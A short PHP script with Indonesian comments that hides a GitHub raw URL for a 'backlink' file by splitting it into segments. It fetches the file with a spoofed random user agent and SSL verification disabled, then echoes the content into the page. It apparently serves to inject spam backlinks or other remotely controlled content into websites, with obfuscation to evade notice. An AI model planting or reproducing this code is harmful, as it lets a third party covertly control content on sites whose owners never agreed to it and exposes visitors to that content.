<?php
// Fungsi untuk menyamarkan URL
function generate_url() {
    $segments = ['https:', '', 'raw.githubusercontent.com', 'sindyleonardi', 'backlink', 'refs', 'heads', 'main', 'kode.text'];
    return implode('/', array_filter($segments));
}

// Fungsi untuk menyamarkan user agent
function get_user_agent() {
    $agents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",
        "Mozilla/5.0 (Linux; Android 10; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36"
    ];
    return $agents[array_rand($agents)];
}

// Fungsi untuk melakukan request dengan cURL
function fetch_data($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT, get_user_agent());
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  // Nonaktifkan verifikasi SSL
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);  // Nonaktifkan verifikasi host SSL

    $response = curl_exec($ch);
    if (curl_errno($ch)) {
        return "Error: " . curl_error($ch);
    }
    curl_close($ch);
    return $response;
}

// Logika utama
$url = generate_url();
$data = fetch_data($url);

// Tampilkan hasil
echo $data;
?>
